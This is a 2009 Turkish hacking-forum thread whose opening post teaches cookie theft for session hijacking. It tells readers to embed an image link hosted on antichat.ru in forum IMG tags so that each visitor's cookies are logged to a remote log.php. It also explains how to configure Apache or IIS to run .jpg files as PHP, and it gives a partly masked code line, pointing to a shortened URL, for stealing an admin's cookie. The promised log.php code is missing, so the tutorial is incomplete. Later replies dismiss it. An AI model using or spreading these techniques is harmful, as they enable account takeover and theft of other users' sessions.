THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

Cookies Çalıma

engin0100 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
TÜRKİYE CUMHURİYETİ
Yaş:
10
Mesajlar:
1.091
Konular:
166
Teşekkür (Etti):
58
Teşekkür (Aldı):
567
Ticaret:
(0) %
3
644
31-10-2009 19:58
#1
Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.



Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.



Foruma mesaj atarken IMG tag ı içine [hide]http://antichat.ru/cgi-bin/s.jpg[/hide] bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi [hide]http://antichat.ru/sniff/log.php[/hide] adresinde loglanıcaktır.







Peki gelelim [hide]http://antichat.ru/cgi-bin/s.jpg[/hide] nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.



Serverınızda apache veya IIS kurulu ise yapmanız gerekenler



Apache için



Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz



IIS de bu işlemi



Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.



Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine



Kod:

********.********=’ https://tik.lat/kgK1x )



yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmak



Log.php kodları:



Kod:
--------------------- Değerli Muhteremler Saygı ve Sevgilerimle
Süresiz BAN İstiyorum....
Sebeb:Pisikoloji Bunalım...
adıyamanlıyılmaz Teşekkür etti.
Doruq91 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2009
Nereden:
.exe
Mesajlar:
187
Konular:
18
Teşekkür (Etti):
5
Teşekkür (Aldı):
20
Ticaret:
(0) %
31-10-2009 21:20
#2
Coocies Leri antiler virus olarak tanıdıkları için anında siliniyor bunları yapmaya gerek kalmıyor
fthftth4141 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2009
Mesajlar:
11
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
1
Ticaret:
(0) %
31-10-2009 21:24
#3
o zaman hiç yapmayalım daha iyi
UstaHackeR90 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
11/2009
Mesajlar:
50
Konular:
6
Teşekkür (Etti):
34
Teşekkür (Aldı):
3
Ticaret:
(0) %
17-11-2009 10:18
#4
pff sacmalık..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler